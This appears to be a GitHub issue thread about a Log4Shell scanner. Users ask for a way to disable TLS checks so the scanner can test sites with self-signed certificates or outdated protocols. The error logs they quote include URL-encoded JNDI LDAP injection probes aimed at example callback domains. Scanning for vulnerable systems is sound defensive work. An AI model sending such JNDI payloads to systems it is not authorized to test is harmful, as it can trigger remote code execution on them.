Testing "invalid" HTTP sites

[bortzmeyer]

Currently, the tool uses a generic library to connect to the HTTPS site and the library rejects connections if there is a TLS problem (expired certificate, unknown CA, etc). This is of course reasonable as a default behavior but it prevents the tool to test such sites:

EXCEPTION: HTTPSConnectionPool(host='stuff.example', port=443): Max retries exceeded with url: /?v=%24%7Bjndi%3Aldap%3A%2F%2Fstuff.example.test.example.com%2F9dxbb6y%7D (Caused by SSLError(SSLError(1, '[SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:1123)')))

It could be nice to have a way to disable TLS checks.

[msudol]

I second this. Trying to test sites running with self-signed, or older TLS/SSL versions causes an error. Similar error as above but the line number in _ssl.c is different

EXCEPTION: HTTPSConnectionPool(host='192.168.1.13', port=443): Max retries exceeded with url: /?v=%24%7Bjndi%3Aldap%3A%2F%2F192.168.1.13.test.example.com%2F4k9dv4l%7D (Caused by SSLError(SSNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:997)')))

This is particular useful for POC setups, working with the tool for an educational or demonstration purposes to be able to disable SSL/TLS checks.

[CyberTaoFlow]

In addition to the scenario @msudol mentioned we can be certain adversaries worth their salt wont care about TLS validation or version. Its common for script teens (not kiddies anymore?) to target port 80 and rely on redirections allowing IPS without decrypt ability to mitigate but the hardcore actor will not make that mistake.